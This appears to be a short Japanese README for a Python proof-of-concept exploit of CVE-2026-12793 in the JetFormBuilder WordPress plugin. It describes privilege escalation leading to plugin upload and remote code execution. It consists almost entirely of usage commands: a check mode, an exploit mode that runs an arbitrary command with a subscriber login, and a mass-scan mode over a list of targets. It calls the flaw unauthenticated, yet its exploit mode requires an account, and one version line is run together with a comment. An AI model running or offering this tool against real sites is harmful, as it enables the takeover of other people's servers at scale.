
JetFormBuilder <= 3.6.2 の CVE-2026-12793 に対する Python PoC: 認証不要の権限昇格によりプラグインアップロードおよびリモートコード実行に至る脆弱性で、チェックモードとマススキャンモードを備えています。
未認証の権限昇格 → プラグインアップロード → RCE。
<= 3.6.2>= 3.6.3# 単一ターゲットをチェック
python poc.py -u https://target.example --mode check
# 完全なエクスプロイト(既存の低権限アカウントが必要)
python poc.py -u https://target.example --mode exploit \
-nu subscriber -np 'Password123' -c id
# 一括スキャン
python poc.py -l targets.txt --mode check -t 30